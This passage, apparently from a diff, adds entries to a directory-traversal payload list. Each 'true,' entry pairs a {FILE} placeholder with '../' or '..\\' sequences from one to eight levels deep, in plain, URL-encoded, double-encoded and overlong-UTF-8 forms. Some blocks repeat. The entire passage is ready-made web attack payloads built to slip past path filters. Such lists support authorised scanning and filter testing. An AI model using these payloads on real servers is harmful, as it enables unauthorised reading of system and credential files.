+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
